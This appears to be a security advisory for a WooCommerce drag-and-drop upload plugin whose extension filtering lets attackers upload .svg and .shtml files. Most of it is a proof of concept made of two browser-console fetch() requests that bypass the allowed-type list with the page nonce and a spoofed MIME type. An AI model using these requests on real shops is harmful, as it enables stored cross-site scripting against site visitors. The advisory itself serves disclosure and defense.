Description The plugin does not filter all potentially dangerous file extensions. Therefore, an attacker can upload unsafe .shtml or .svg files containing malicious scripts.

PoC

Using malicious SVG files: Go to a product page that features the file upload form, and paste the following in your browser console: fetch("/wp-admin/admin-ajax.php", { "credentials": "omit", "headers": { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------4807439943981355138852449656" }, "referrer": "http://wpscan-vulnerability-test-bench.ddev.site/product/catapult/", "body": `-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"supported_type\"\r\n\r\njpg|jpeg|png|gif|pdf|doc|docx|xls|xlsx|stl|mp4|mp3|zip|svg\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"size_limit\"\r\n\r\n10485760\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\ndnd_codedropz_upload_wc\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"security\"\r\n\r\n${dnd_wc_uploader.nonce}\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"dnd-wc-upload-file\"; filename=\"xss.svg\"\r\nContent-Type: image/jpeg\r\n\r\n\n\r\n-----------------------------4807439943981355138852449656--\r\n`, "method": "POST", "mode": "cors" }).then(x=>x.text()).then(x=>console.log(x)); You can then access the malicious file at http://vulnerable-site.tld/wp-content/uploads/wc_drag-n-drop_uploads/xss.svg # Using malicious SHTML files: Go to a product page that features the file upload form, and paste the following in your browser console: fetch("/wp-admin/admin-ajax.php", { "credentials": "omit", "headers": { "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------4807439943981355138852449656" }, "body": `-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"supported_type\"\r\n\r\njpg|jpeg|png|gif|pdf|doc|docx|xls|xlsx|stl|mp4|mp3|zip|shtml\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"size_limit\"\r\n\r\n10485760\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\ndnd_codedropz_upload_wc\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"security\"\r\n\r\n${dnd_wc_uploader.nonce}\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"dnd-wc-upload-file\"; filename=\"xss.shtml\"\r\nContent-Type: image/jpeg\r\n\r\n\n\r\n-----------------------------4807439943981355138852449656--\r\n`, "method": "POST", "mode": "cors" }).then(x=>x.text()).then(x=>console.log(x)); You can then access the malicious file at http://vulnerable-site.tld/wp-content/uploads/wc_drag-n-drop_uploads/xss.shtml